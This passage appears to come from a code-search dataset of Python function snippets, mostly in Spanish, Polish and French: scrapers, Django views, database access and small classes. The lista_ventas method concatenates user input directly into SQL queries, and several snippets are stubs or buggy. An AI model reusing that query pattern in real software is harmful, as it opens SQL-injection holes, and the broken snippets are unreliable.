field[\"config\"][\"settings\"][\"format\"] == 'html':\n print (text.encode('utf-8'))\n html_text = BeautifulSoup(text, \"html5lib\")\n for p_tag in html_text.find_all('p'):\n p_tag.unwrap()\n for br_tag in html_text.find_all('br'):\n br_tag.name=\"text:line-break\"\n html_text.find('html').unwrap()\n html_text.find('head').unwrap()\n html_text.find('body').unwrap()\n text = unicode(html_text)\n #text = strip_tags(text)\n return text\n elif field[\"type\"] == \"embed\":\n return field[\"values\"][0][\"embed\"][\"url\"]\n else:\n #print field[\"type\"]\n return field[\"values\"][0][\"value\"]", "def get_first_item(self):\n params = urllib.parse.urlencode({'o':'1', 'q':self.query})\n url = 'https://www.leboncoin.fr/annonces/offres/ile_de_france/?{:s}'.format(params) # Cree l'url de recherche en get\n html = urllib.request.urlopen(url)\n if url != html.geturl():\n return None\n soup = BeautifulSoup.BeautifulSoup(html, 'html5lib')\n try:\n products = soup.section.find_all('a', 'list_item clearfix trackable')\n except Exception as e:\n print('Nothing found on leboncoin')\n return None\n for product in products: # recupere les differentes informations de chaque produit\n if str(product.section.h2).strip() == 'None':\n continue\n name = product.section.h2.contents[0].strip()\n price = self.__get_price(product)\n link = 'http:' + product['href']\n return (name, price, link)\n return None", "def get_details(self):", "def __init__(self, lista_enlazada): \n\t\tself.lista = lista_enlazada\n\t\tself.anterior = None\n\t\tself.actual = lista_enlazada.prim\n\t\tself.pila_anteriores = Pila()\n\t\tself.posicion = 0", "def __init__(self, nombre_depto, id_depto):\n self.nombre_depto = nombre_depto\n self.id_depto = id_depto\n self.empleados = []", "def apilar(self,dato):\r\n\t\tself.elementos.append(dato)\r\n\t\tself.len += 1", "def list(self):", "def ustal_kon(self, f):\n kon= Kon.objects.using(settings.DBS(self.firma)).filter(id= f.nip_nabywcy)\n if kon:\n return kon[0]\n \n kon= Kon()\n \n # Numer dla zagranicznego\n nr_kon= Kon.objects.using(settings.DBS(self.firma)).exclude(nr_kon__startswith= 'Z').aggregate(Max('nr_kon'))\n kon.nr_kon= '{:05d}'.format(int(nr_kon['nr_kon__max'].strip())+1)\n\n if '/' in f.nazwa_nabywcy:\n kon.skrot, kon.nazwa= f.nazwa_nabywcy.split('/')\n else:\n kon.nazwa= f.nazwa_nabywcy\n \n kon.id= f.nip_nabywcy\n kon.idtyp= 'NIPUE' if re.match('[A-Z][A-Z]', f.nip_nabywcy) else 'NIP'\n kon.ulica, kon.kod, kon.miejsc= self.adres_kon(f.adres_nabywcy)\n \n kon.kraj= f.nip_nabywcy[:2] if re.match('[A-Z][A-Z]', f.nip_nabywcy) else 'PL'\n \n kon.id_obcy= f.id # zapamiętanie skąd się zwiął (faktura)\n \n kon.skrot= su(kon.skrot)\n kon.nazwa= su(kon.nazwa)\n kon.miejsc= su(kon.miejsc)\n kon.ulica= su(kon.ulica)\n \n kon.kiedy= datetime.date.today() # data utworzenia\n kon.data_us= kon.kiedy\n if f.termin_platnosci and f.data_wystawienia:\n kon.term_zap= (f.termin_platnosci - f.data_wystawienia).days\n \n kon.save(using= settings.DBS(self.firma))\n \n return kon", "def get_label():\r\n\r\n user = check_auth(request.headers, __name__)\r\n if user != True:\r\n return user\r\n user = authorize.get(request.headers.get('UserToken'))\r\n\r\n vozvrat = {}\r\n try:\r\n database = Database(config)\r\n except TypeError:\r\n vozvrat[\"messageError\"] = \"Нет подключения к БД\"\r\n return jsonify(vozvrat)\r\n\r\n vozvrat = []\r\n\r\n fields = [\r\n \"u.firstname\",\r\n \"u.lastname\",\r\n \"up.id\",\r\n \"up.name\",\r\n \"up.photo\",\r\n \"up.type\",\r\n \"up.method\",\r\n \"up.sale\",\r\n \"up.price\",\r\n \"c.name\",\r\n \"up.weight\",\r\n \"u2.name\",\r\n \"fp.id\",\r\n \"a.country\",\r\n \"a.city\",\r\n \"a.address\",\r\n \"a.lat\",\r\n \"a.lng\"\r\n ]\r\n\r\n query = sql.SQL(\"SELECT {} FROM users u \\\r\n RIGHT JOIN users_product up on u.id = up.user_id\\\r\n LEFT JOIN units u2 on up.unit_id = u2.id\\\r\n LEFT JOIN currencys c on up.currency_id = c.id\\\r\n LEFT JOIN favorit_products fp on u.id = fp.user_id\\\r\n LEFT JOIN address a on up.address_id = a.id\").format(\r\n sql.SQL(\",\").join(sql.Identifier(\r\n i.split('.')[0], i.split('.')[1]) for i in fields)\r\n )\r\n execute = database.select_data(query)\r\n if type(execute) != list:\r\n return execute\r\n\r\n data_append = {}\r\n for row in execute:\r\n for i in range(len(fields)):\r\n value = row[i]\r\n\r\n if fields[i] == \"up.id\":\r\n fields[i] = \"up.users_product_id\"\r\n if fields[i] == \"c.name\":\r\n fields[i] = \"c.currency\"\r\n if fields[i] == \"u2.name\":\r\n fields[i] = \"u2.unit\"\r\n if fields[i] == \"fp.id\":\r\n fields[i] = \"fp.is_favorit\"\r\n value = True if value != None else False\r\n\r\n data_append[fields[i].split('.')[1]] = value\r\n vozvrat.append(data_append)\r\n\r\n return jsonify(vozvrat)", "def particle(lieu):\r\n\r\n path = \"https://air.plumelabs.com/fr/live/{}\".format(lieu)\r\n request_html = requests.get(path)\r\n page = request_html.content\r\n soup = BeautifulSoup(page, \"html.parser\")\r\n\r\n liste = []\r\n propriete = soup.find_all(\"div\")\r\n for i in propriete:\r\n liste.append(i.get_text())\r\n\r\n\r\n liste_e = liste[20:21]\r\n pollute = liste_e[0][31:34]\r\n\r\n return pollute", "def test_match_elementos_BD(self):\n respuesta = self.client.get(self.response)\n\n for i in respuesta.data:\n # print(i)\n v = Musica.objects.get(id=i[\"id\"])\n self.assertEqual(i[\"artista\"], v.artista)\n self.assertEqual(i[\"owner\"], v.owner.username)\n # print(Musica.objects.filter(id=i['id']).count())", "def __init__(self,obj):\n self.nature_libelle = obj['NatureLibelle']\n self.ins_nom = obj['InsNom']\n self.ins_numero_install = obj['InsNumeroInstall']\n self.equipement_id = obj['EquipementId']", "def lista_ventas(self,tipo,lista,filtro):\n self.lista=self.builder.get_object(lista)\n self.lista.clear()#Limpia la lista\n busqueda = \"\"\n\n if tipo==\"\":\n print(\"Llego a buscar ventas en BD\")\n #result=self.db.execute('SELECT * FROM Venta')\n busqueda = self.db.execute('SELECT ventaID ,fechaVenta, fechaInicio, fechaFin, C.nombre, P.nombre FROM Cliente C, Paquete P, Venta V WHERE V.IdCli = C.clienteID AND V.IdPaq = P.paqueteID')\n elif tipo == \"Cliente\":\n print(\"Busco venta por nombre del cliente\")\n busqueda = self.db.execute(\"SELECT ventaID ,fechaVenta, fechaInicio, fechaFin, C.nombre, P.nombre FROM Cliente C, Paquete P, Venta V WHERE V.IdCli = C.clienteID AND V.IdPaq = P.paqueteID AND C.nombre LIKE '%\"+filtro+\"%'\")\n elif tipo == \"Viaje\":\n print(\"Busco venta por nombre del paquete\")\n busqueda = self.db.execute(\"SELECT ventaID ,fechaVenta, fechaInicio, fechaFin, C.nombre, P.nombre FROM Cliente C, Paquete P, Venta V WHERE V.IdCli = C.clienteID AND V.IdPaq = P.paqueteID AND P.nombre LIKE '%\"+filtro+\"%'\")\n elif tipo == \"Fecha de inicio\":\n print(\"Busco venta por fecha de inicio\")\n busqueda = self.db.execute(\"SELECT ventaID ,fechaVenta, fechaInicio, fechaFin, C.nombre, P.nombre FROM Cliente C, Paquete P, Venta V WHERE V.IdCli = C.clienteID AND V.IdPaq = P.paqueteID AND fechaInicio LIKE '%\"+filtro+\"%'\")\n elif tipo == \"Fecha de fin\":\n print(\"Busco venta por fecha de fin\")\n busqueda = self.db.execute(\"SELECT ventaID ,fechaVenta, fechaInicio, fechaFin, C.nombre, P.nombre FROM Cliente C, Paquete P, Venta V WHERE V.IdCli = C.clienteID AND V.IdPaq = P.paqueteID AND fechaFin LIKE '%\"+filtro+\"%'\")\n \n for row in busqueda: \n #Empieza por la [1] porque el ID es la [0]\n # self.lista.append([row[4],row[5],row[1],row[2],row[3]])\n self.lista.append([row[1],row[2],row[3],row[4],row[5],row[0]])\n print(\"Listo ventas en tabla\")", "def apilar(pila, dato):\n pila.cima += 1\n pila.datos[pila.cima] = dato", "def getIntervenciones():", "def PolonaScan(title:str):\n e_id = PolonaGetFirst(title)\n\n #Get data of an entity\n URL='https://polona.pl/api/entities/'+e_id+'/'\n\n r = requests.get(URL,None)\n data = r.json()\n\n scanlist = list()\n for i in data['scans']:\n scanlist.append(str(i['resources'][0]['url']))\n \n return scanlist", "def object(self):", "def cima(pila):\n return pila.datos[pila.tope]", "def listar_atributos(request,idAtributoTI,id_item,ver = None):\n print('el id del item es :',id_item)\n atributos = Atributo_Item.objects.filter(id_item=id_item) #obtiene los valores del atributo del item\n TI=TipoItem.objects.get(id_ti=idAtributoTI) #obtiene el tipo de item\n atributo= Atributo.objects.filter(ti=TI) #lista los atributos del tipo de item\n itemActual=Item.objects.get(id_item=id_item) #el item a ser modificado\n if(request.method=='POST'):\n if request.method == 'POST':\n ''' obtengo el item viejo (itemActual) y actualizo sus valores de boolean a false.'''\n itemActual.actual=False\n itemActual.save()\n '''Ahora en estas variables voy a obtener los valores editados de mi ITEM '''\n nombre_item_editado = request.POST.get('item_nombre')\n descripcion_item_editado = request.POST.get('item_descripcion')\n estado_item_editado = request.POST.get('item_estado')\n costo_item_editado = request.POST.get('item_costo')\n print('nombre es:',nombre_item_editado)\n ''' crear un nuevo item, con un nuevo id con los valores recibidos del form'''\n item_editado = Item(nombre=nombre_item_editado,descripcion=descripcion_item_editado,costo=costo_item_editado,\n actual=True,estado=itemActual.estado,fase_id=TI.fase_id,ti_id=TI.id_ti)\n item_editado.save()\n\n ''' Crear un nuevo registro en la tabla versiones con los valores correspondientes del id_padre y version'''\n version_item_actual= Versiones.objects.get(id_item=itemActual.id_item) #obtengo el registro del item actual\n varsion_item_editado = Versiones(id_item=item_editado.id_item, id_padre= version_item_actual.id_padre,\n id_Version=version_item_actual.id_Version+1)\n varsion_item_editado.save()\n\n diccionario_data = verificar_datos_form_atributo_item(request,TI.id_ti,atributo,request.POST,request.FILES)\n print('el diccionario data es: ',diccionario_data)\n for data in diccionario_data:\n if(data['AtributoTI'].tipo_dato=='File'): #si es de tipo File ,entonces armo la ruta para subir el archivo\n if(data['valor_atributo_item'] != 'Sin archivos adjuntos' and data['valor_atributo_item'] != 'Archivo Elminado' ): # si se recibe algo es porque el edito el archivo, por lo tanto creamos una nueva ruta en la nube\n ruta = str(TI.fase.id_Proyecto.id_proyecto) + \"/\" + str(item_editado.id_item)\n doc = data['valor_atributo_item']\n PATH = f'/{ruta}/{doc[0]}'\n ''' proceso de subir archivo a dropbox'''\n SubirArchivo(doc[0], PATH)\n print('-----',PATH)\n ##se sube archivo a dropbox en segundo plano\n t2 = Thread(\n target=SubirArchivo,\n args=(doc[0], PATH),\n )\n t2.start()\n atributo_item_editado = Atributo_Item(idAtributoTI=data['AtributoTI'], id_item=item_editado,\n valor=PATH)\n atributo_item_editado.save()\n elif(data['valor_atributo_item'] == 'Archivo Elminado'):\n atributo_item_editado = Atributo_Item(idAtributoTI=data['AtributoTI'],\n id_item=item_editado,\n valor='Sin archivos adjuntos')\n atributo_item_editado.save()\n else:\n atributo_item_editado = Atributo_Item(idAtributoTI=data['AtributoTI'], id_item=item_editado,\n valor=Atributo_Item.objects.get(id_item=itemActual,idAtributoTI=data['AtributoTI']).valor)\n print('el editado sin modificar',atributo_item_editado.valor)\n atributo_item_editado.save()\n else:\n print('atributo_id:',data['AtributoTI'].id_atributo,' valor:',data['valor_atributo_item'])\n atributo_item_editado=Atributo_Item(idAtributoTI=data['AtributoTI'], id_item=item_editado,\n valor=data['valor_atributo_item'])\n atributo_item_editado.save()\n '''aca se actulizan las relaciones del item'''\n itemActual_inicio=Relacion.objects.filter(inicio_item=itemActual.id_item) #obtengo todos los items en donde el es el origen\n for relacion in itemActual_inicio:\n nueva_relacion=Relacion(inicio_item=item_editado.id_item,fin_item=relacion.fin_item)\n nueva_relacion.save()\n\n itemActual_fin = Relacion.objects.filter(fin_item=itemActual.id_item) # obtengo todos los items en donde el es el fin\n for relacion in itemActual_fin:\n nueva_relacion = Relacion(inicio_item=relacion.inicio_item, fin_item=item_editado.id_item)\n nueva_relacion.save()\n\n return redirect('gestion:detallesFase',TI.fase_id)\n\n\n context = {\n \"atributos\":atributos,\n \"atributo\":atributo,\n 'proyectos': itemActual.fase.id_Proyecto,\n 'item':itemActual,\n 'true':True,\n 'false':False,\n 'ver':ver\n }\n return render(request, 'items/listar_atributos.html', context)", "def __init__(self, diccionario):\n self.numero = diccionario['numero']\n self.nombre = diccionario['equipo_nombre']\n self.pokmov = lectores.pokemon_y_movimiento_a_tuplas(diccionario)", "def PolonaGetFirst(title:str):\n URL='https://polona.pl/api/entities/'\n PARAMS={'query':title, 'size':'1', 'public':'1'}\n\n r = requests.get(URL, PARAMS)\n data = r.json()\n e_id = data['hits'][0]['id']\n return e_id", "def __init__(self):\n self.modelo = [\"A\", \"sucio\", \"sucio\",\"sucio\", \"sucio\",\"sucio\", \"sucio\"]", "def listar_gabarito():\n return GabaritoProva.listar(gabarito)", "def buscar(self, *args):\n texto = self.get_text()\n campos = self.modelo._meta.fields\n query = Q()\n for c in campos:\n if not isinstance(c, fields.related.ForeignKey):\n field = c.name\n q = Q(**{\"%s__icontains\" % field : texto})\n query = query | q\n elementos = self.modelo.objects.filter(query)\n if len(elementos) == 1:\n self.objeto = elementos[0]\n self.set_text(self.objeto.__str__())\n self.id = self.objeto.id\n self.modify_base(gtk.STATE_NORMAL, gtk.gdk.color_parse(\"#FFFFFF\"))\n else:\n self.busqueda = Busqueda(self, texto)\n self.busqueda.connect('usar', self.usar)", "def obtenerObra(self):\n rowActual = self.tableOs.currentItem().row()\n self.lineRazon.setText(str(self.tableOs.item(rowActual,0).text()))\n self.lineRazon.setEnabled(False)\n self.obraSocial=str(self.tableOs.item(rowActual,0).text())\n self.lineCuit.setText(str(self.tableOs.item(rowActual,1).text()))\n self.lineCuit.setEnabled(False)\n self.tableOs.setEnabled(False)\n self.gbFactura.setEnabled(True)\n self.gbNotaCredito.setEnabled(True)", "def get_object(id):", "def __str__(self):\n return self.idLancamentosPagar", "def GetDataAsObject(self):", "def __init__(self):\n self.enfila= 0\n self.fila = []", "def model(self):", "def model(self):", "def model(self):", "def model(self):", "def model(self):", "def __iter__(self):\n ids_productos = self.carro.keys()\n #obtiene los objetos producto y los agrega al carro\n productos = Producto.objects.filter(id__in=ids_productos)\n for producto in productos:\n self.carro[str(producto.id)]['producto'] = producto\n\n for item in self.carro.values():\n item['precio']=Decimal(item['precio'])\n item['precio_total'] = item['precio']*item['cantidad']\n yield item", "def apiEditar():\n response.view = 'generic.json'\n\n def GET(*args, **vars):\n # if not request.env.request_method == 'GET': raise HTTP(403)\n # proveedores = db().select(db.proveedor.ALL).as_list()\n return dict()\n\n def POST(*args, **vars):\n # raise HTTP(403)\n pieza = vars[\"pieza\"]\n proveedores_list = vars[\"proveedores_list\"]\n respuesta = \"ok\"\n idProveedor = 0\n\n fechaIn = pieza[\"fechaIn\"].split('/')\n fechaString = fechaIn[2] + '-' + fechaIn[1] + '-' + fechaIn[0]\n\n pieza_data = dict(codigo=pieza[\"codigo\"], nombre=pieza[\"nombre\"],\n descripcion=pieza[\"descripcion\"], cantidad=pieza[\"cantidad\"],\n unidad=pieza[\"unidad\"], precio_entrada=pieza[\"precioIn\"],\n precio_salida=pieza[\"precioOut\"], fecha_entrada=fechaString)\n\n # Verificar si aumento la cantidad. Para asi dar nueva entrada\n cantidad_antigua = db.pieza(pieza[\"id\"]).cantidad\n cantidad_nueva = int(pieza[\"cantidad\"]) - cantidad_antigua if cantidad_antigua < int(\n pieza[\"cantidad\"]) else int(pieza[\"cantidad\"])\n\n registrar_entrada = cantidad_antigua != int(pieza[\"cantidad\"]) and cantidad_nueva != 0\n\n if registrar_entrada:\n id_pieza_entrada = db.pieza_entrada.insert(codigo=pieza[\"codigo\"], nombre=pieza[\"nombre\"],\n descripcion=pieza[\"descripcion\"], cantidad=cantidad_nueva,\n unidad=pieza[\"unidad\"], precio_entrada=pieza[\"precioIn\"],\n precio_salida=pieza[\"precioOut\"], fecha_entrada=datetime.datetime.now().date())\n\n for prov in proveedores_list:\n db.proveedor_entrada.insert(\n id_pieza_entrada=id_pieza_entrada, nombre=prov[\"nombre\"], descripcion=prov[\"descripcion\"],\n direccion=prov[\"direccion\"], telefono=prov[\"telefono\"])\n\n # Actualizo la pieza\n try:\n db(db.pieza.id == pieza[\"id\"]).update(**pieza_data)\n db(db.pieza_proveedor.id_pieza == pieza[\"id\"]).delete()\n\n for prov in proveedores_list:\n db.pieza_proveedor.insert(\n id_pieza=pieza[\"id\"], id_proveedor=prov[\"id\"])\n\n except Exception:\n respuesta = \"error\"\n\n return dict(respuesta=respuesta)\n # return dict(proveedor=proveedor)\n\n return locals()", "def __init__(self):\n self.tours = []\n self.grille = Grille()", "def valor(self):\n try:\n objeto = self.objeto\n except AttributeError:\n objeto = None\n return objeto", "def obtener_productos():\n\n # Se crea la lista de objetos Producto()\n productos = [\n Producto(\"Caja chica\", 5, 100.0),\n Producto(\"Caja mediana\", 3, 185.0),\n Producto(\"Caja grande\", 1, 299.0)\n ]\n\n return productos", "def listar_tipo_item(request,id_proyecto):\n fases=Fase.objects.filter(id_Proyecto_id=id_proyecto)\n proyectos=Proyecto.objects.get(id_proyecto=id_proyecto)\n tipoItem=[]\n\n for fase in fases:\n tipoItem += [{ 'fase':fase,\n 'ti':TipoItem.objects.filter(fase_id=fase.id_Fase)\n }]\n\n print(tipoItem)\n contexto={\n 'proyectos':Proyecto.objects.get(id_proyecto=id_proyecto),\n 'TipoItem':tipoItem\n }\n return render (request,'proyectos/listarTipoItem.html',contexto)", "def get(id):\n elements = Advertisements().get_one_element(id)\n data = jsonify(elements)\n if data is None:\n return abort(500, \"L'élément n'existe pas.\")\n else:\n data.statut_code = 200\n return data", "def __init__(self, nombre, socios):\n self.__nombre = nombre\n self.__socios = socios\n self.__resultados = {'p1': '', 'p2': '', 'p3': '', 'p4': '', 'p5': '', 'p6': '', 'p7': ''}", "def retrieve(self, request, pk=None,format=None):\n curso = get_object_or_404(Curso, pk=pk)\n turmas = Turma.objects.all().filter(curso=curso)\n serializer = TurmaSerialiser(turmas,many=True)\n return Response(serializer.data)", "def list_gemeente_adapter(obj, request):\n return {\n 'id': obj.id,\n 'niscode': obj.niscode,\n 'naam': obj.naam\n }", "def test_generate_single_element_get(self):\n pass", "def presenetCar():", "def objects(self):", "def ListaDeAlumnosAPI(request):\n if request.method == 'GET':\n alumnos = Alumno.objects.all()\n serializer = AlumnoSerializer(alumnos, many=True)\n return Response(serializer.data)\n\n elif request.method == 'POST':\n serializer = AlumnoSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)", "def retrieve(self):\n pass", "def cargarProductosSinObra(self):\n\n self.limpiarTabla(self.tableProductos)\n\n ##Cnsulta para obtener todos los productos del sistema, con su correspondiente\n ##codigo de barra, monodroga, descuento, importe\n query=self.sesion.query(ProductoModel.codigo_barra,ProductoModel.id_medicamento,ProductoModel.id_presentacion,MonodrogaModel.nombre,ProductoModel.importe).\\\n join(MedicamentoModel).filter(ProductoModel.id_medicamento==MedicamentoModel.nombre_comercial).\\\n join(MonodrogaModel).filter(MedicamentoModel.id_monodroga==MonodrogaModel.nombre).\\\n filter(ProductoModel.baja==False).order_by(ProductoModel.codigo_barra)\n\n ##Se cargan los datos obtenidos en la tabla de Producto\n for n, obj in enumerate(query):\n self.tableProductos.insertRow(n)\n self.tableProductos.setItem(n, 0, QtGui.QTableWidgetItem(str(obj[0])))\n self.tableProductos.setItem(n, 1, QtGui.QTableWidgetItem(str(obj[1])))\n self.tableProductos.setItem(n, 2, QtGui.QTableWidgetItem(str(obj[2])))\n self.tableProductos.setItem(n, 3, QtGui.QTableWidgetItem(str(obj[3])))\n self.tableProductos.setItem(n, 4, QtGui.QTableWidgetItem(str(0)))\n self.tableProductos.setItem(n, 5, QtGui.QTableWidgetItem(str(obj[4])))\n\n ##Se carga la cantidad de cada producto en la tabla\n for row,producto in enumerate(ProductoModel.buscarTodos(ProductoModel.codigo_barra,self.sesion)):\n self.tableProductos.setItem(row,6,QtGui.QTableWidgetItem(str(producto.getCantidad(self.sesion))))", "def eksport(lista):\n # wynik - lista zawierajaca wynik koncowy dzialania funkcji(lata i wartosci dla poszczegolnych panstw)\n wynik = []\n for panstwo in lista:\n # rok - lista zawierajaca lata\n # wartosc - lista zawierajaca wartosci dla lat\n rok = []\n wartosc = []\n for element in panstwo:\n # sprawdzenie czy klucz posiada odpowiednia wartosc\n if element[1].get('key') == \"NE.EXP.GNFS.CD\":\n # dodanie roku do listy\n rok.append(int(element[2].text))\n # rozpatrywanie przypadku w ktorym wartosc jest None\n if element[3].text is None:\n wartosc.append(element[3].text)\n else:\n wartosc.append(float(element[3].text))\n # dodawanie list dla poszczegolnych panstw do listy wynikowej\n wynik.append(rok)\n wynik.append(wartosc)\n\n return wynik", "def scrape_carteleraVIEJA(data, comp_nom):\t\n\t\n\tfunciones = []\n\tsoup = BeautifulSoup(data, convertEntities=BeautifulStoneSoup.HTML_ENTITIES)\n\tshow_exp = re.compile(r'sid=(\\d+)')\n\t\n\tcomplejo_org = Complejo.objects.get(nombre=comp_nom)\n\t\n\t#Busca complejo platino... en caso de existir:\n\tcomplejo_platino = complejo_org\n\t\n\t\n\tpeliculas = soup.find('table', cellspacing='0', cellpadding='0', border='0').contents[3:-1:2]\n\t\n\tfor peli in peliculas:\n\t\ttres_D = False\n\t\tidioma = None\n\t\t\n\t\t#Checar tiene logo de 3d\n\t\tif peli.find('div', 'icono_platino').find('img', src=re.compile(r'3d.png$')): tres_D = True\n\t\t\n\t\t#Encabezado contiene titulo e idioma\n\t\tencabezado = peli.find('li', 'texto_3', style='margin: 2px 0px 0px; float: left; width: 155px;')\n\t\ttitulo = ''.join(encabezado.findAll(text=True)).replace('\\n', '').strip()\n\t\t\n\t\t\n\t\t#Determina Idioma\n\t\tif encabezado.find('img', alt='idioma').get('src', '').find('ing') > 0:\n\t\t\tidioma = 'ingles'\n\t\telse:\n\t\t\tidioma = 'espanol'\n\t\t\n\t\ttit = '|'+ titulo + '|'\n\t\t#Buscar pelicula por titulo segun idioma y 3d.. subtitulada o no.\n\t\tpeli_query = Pelicula.objects.filter(alt_tit__icontains=tit, tres_D=tres_D)\n\t\tif len(peli_query) > 1:\n\t\t\t#Si idioma == ingles, selecciona la pelicula subtitulada\n\t\t\tpelicula = peli_query.filter(subtitulada= (idioma == 'ingles') )\n\t\telif len(peli_query) == 1:\n\t\t\tpelicula = peli_query[0]\n\t\telse:\n\t\t\tlogger.debug( \"No se encontro pelicula %s\" % titulo\t\t)\n\t\t\t\n\t\thoras_html = peli.find('div', id='horax')\n\t\tplatino_b= False\t\t\n\t\tfor tag in horas_html.contents:\n\t\t\t#Me salto todo lo que no es html\n\t\t\tif type(tag) != NavigableString:\t\t\n\t\t\t\t#En caso de que sea funciones de platino\n\t\t\t\tif tag.name == 'center':\n\t\t\t\t\tplatino_b = True\n\t\t\t\t\tfuncion_name = ''.join(tag.findAll(text=True)).strip()\n\t\t\t\t\tif funcion_name.find('Platino') > -1:\n\t\t\t\t\t\t#Ajustar el complejo para platino\n\t\t\t\t\t\tcomplejo = complejo_platino\n\t\t\t\t\t\t\n\t\t\t\telif tag.get('style','').find('border-bottom: 1px solid rgb(238, 207, 0);') > -1:\n\t\t\t\t\t#Ajustar de regreso el complejo normal\n\t\t\t\t\tcomplejo = complejo_org\n\t\t\t\t\tplatino_b = False\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t#Si es renglon de hora y no algo mas como <br/>\t\t\t\n\t\t\t\tif tag.name== 'div' and tag.get('id','') == 'general':\n\t\t\t\t\tfecha = parseDate(tag.find('div', id=fecha).string)\n\t\t\t\t\tfunciones.extend(\n\t\t\t\t\t\t[{\n\t\t\t\t\t\t\t'pelicula': pelicula,\n\t\t\t\t\t\t\t'complejo': complejo,\n\t\t\t\t\t\t\t'hora': datetime.datetime(fecha.year, fecha.month, fecha.day, *time.strptime( hora_html.string , '%H:%M')[3:5]),\n\t\t\t\t\t\t\t'pol_idShowTime': show_exp.search(hora_html['href']).group(1),\n\t\t\t\t\t\t\t} for hora_html in tag.find('div', id='funciones').find('a', 'texto_1')]\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t)\n\t\t\t\t\t#logger.debug( funciones)\n\treturn funciones", "def traer_enfermedad(request):\n tipo_motivos = MotivosConsultas.objects.filter(id=request.GET['pk'])\n data = serializers.serialize('json', tipo_motivos, fields={'descripcion'})\n return HttpResponse(data, content_type='application/json')", "def AlumnoDetalleAPI(request, pk):\n try:\n alumno = Alumno.objects.get(pk=pk)\n except Alumno.DoesNotExist:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n if request.method == 'GET':\n serializer = AlumnoSerializer(alumno)\n return Response(serializer.data)\n\n elif request.method == 'PUT':\n serializer = AlumnoSerializer(alumno, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n elif request.method == 'DELETE':\n alumno.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)", "def __init__():\n self.placa = placa", "def carregarResponsavel(self, ide):\r\n try:\r\n self.__id = int(ide)\r\n self.cursor.execute(\"SELECT * FROM RESPONSAVEL WHERE ID = %s;\" %(self.__id))\r\n if self.cursor.rowcount == 1:\r\n return self.cursor.fetchone()\r\n else:\r\n return None\r\n except:\r\n return None", "def get_curso_inscripcion(request):\n if request.method == 'GET':\n serializer = CursoSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n if \"curso\" in serializer.validated_data:\n try:\n curso = Curso.nodes.get(nombre__icontains=serializer.validated_data[\"curso\"])\n resp = {\"nombre_curso\": curso.__dict__[\"nombre\"], \"link\": curso.__dict__[\"link\"]}\n return JsonResponse(resp, status=status.HTTP_200_OK)\n except Curso.DoesNotExist:\n print(\"Cant find (CURSO) \", serializer.validated_data[\"curso\"])\n return JsonResponse({\"error\": \"(CURSO) \" + serializer.validated_data[\"curso\"] + \" not found \"},\n status=status.HTTP_404_NOT_FOUND)\n if \"codigo\" in serializer.validated_data:\n try:\n curso = Curso.nodes.get(cod__icontains=serializer.validated_data[\"codigo\"])\n resp = {\"nombre_curso\": curso.__dict__[\"nombre\"], \"link\": curso.__dict__[\"link\"]}\n return JsonResponse(resp, status=status.HTTP_200_OK)\n except Curso.DoesNotExist:\n print(\"Cant find (CURSO) \", serializer.validated_data[\"codigo\"])\n return JsonResponse({\"error\": \"(CURSO) \" + serializer.validated_data[\"codigo\"] + \" not found \"},\n status=status.HTTP_404_NOT_FOUND)\n return JsonResponse(serializer.errors, status=status.HTTP_404_NOT_FOUND)", "def test_get_insumo(self):", "def test_buscar_por_sigla(self):\n ape1 = APE.objects.get(sigla=\"APX1\")\n ape2 = APE.buscar_por_sigla(\"APX1\")\n self.assertIsNotNone(ape1, \"El APE encontrado con GET no debería ser None\")\n self.assertIsNotNone(ape1, \"El APE encontrado con buscar_por_sigla no debería ser None\")\n self.assertEqual(ape1.sigla, ape2.sigla, \"Las siglas no son las mismas\")\n self.assertEqual(ape1.id, ape2.id, \"Los objetos no tienen los mismos ids\")", "def getById(self, id):\n try:\n c = self.conn.cursor()\n c.execute(\"SELECT * FROM Klient WHERE id=?\", (id,))\n inv_row = c.fetchone()\n klient = Klient(id=id, imie=inv_row[1], nazwisko=inv_row[2])\n if inv_row == None:\n klient=None\n else:\n klient.imie = inv_row[1]\n klient.nazwisko = inv_row[2]\n klient.ilosc = inv_row[3]\n c.execute(\"SELECT * FROM Lokaty WHERE klient_id=? order by nazwa\", (id,))\n inv_items_rows = c.fetchall()\n items_list = []\n for item_row in inv_items_rows:\n item = Lokata(nazwa=item_row[0], ilosc=item_row[1], oprocentowanie=item_row[2])\n items_list.append(item)\n klient.lokaty=items_list\n except Exception as e:\n #print \"klient getById error:\", e\n raise RepositoryException('error getting by id klient_id: %s' % str(id))\n return klient", "def test_listado(self):\n respuesta = self.client.get(self.response)\n self.assertEqual(200, respuesta.status_code)\n # print(self.response)\n # print(respuesta.data)", "def agg_listar_tipo_item(request,id_fase):\n\n fase_proyecto=Fase.objects.get(id_Fase=id_fase)\n proyecto=Proyecto.objects.get(id_proyecto=fase_proyecto.id_Proyecto.id_proyecto)\n\n if validar_permiso(request.user,\"is_gerente\",fase_proyecto.id_Proyecto) or request.user.has_perm('crear_item',proyecto) and validar_rol_fase('crear_item',fase_proyecto,request.user):\n print('tiene el permiso de crear_item')\n else:\n messages.error(request,\"NO SE POSEE EL PERMISO: crear_item\" + \" SOLICITE EL PERMISO CORRESPONDINTE PARA REALIZAR LA ACCION\")\n return redirect('gestion:detallesFase',fase_proyecto.id_Proyecto.id_proyecto)\n\n item_id=Item.objects.last()\n tipoItem = TipoItem.objects.filter(fase_id=id_fase)\n if(tipoItem.count() == 0):\n return HttpResponse(request,\"id de fase invalida\",status=400)\n\n if request.method == 'POST':\n x=request.POST.get('ti')\n item=Item.objects.last()\n tipoItem2 = TipoItem.objects.filter(nombre=x,fase_id=id_fase)\n print(tipoItem2)\n item.ti =tipoItem2[0]\n item.save()\n\n return redirect('gestion:aggAtributos',tipoItem2[0].id_ti)\n\n contexto={\n 'TipoItem':tipoItem,\n 'id_item':item_id.id_item\n }\n return render (request,'items/aggTI.html',contexto)", "def view(self):", "def query(self):", "def retirer_objet(self, nom_membre):\n membre = self.get_membre(nom_membre)\n objet = membre.tenu\n membre.tenu = None", "def uvozi_podatke(tabele):\n for t in tabele:\n 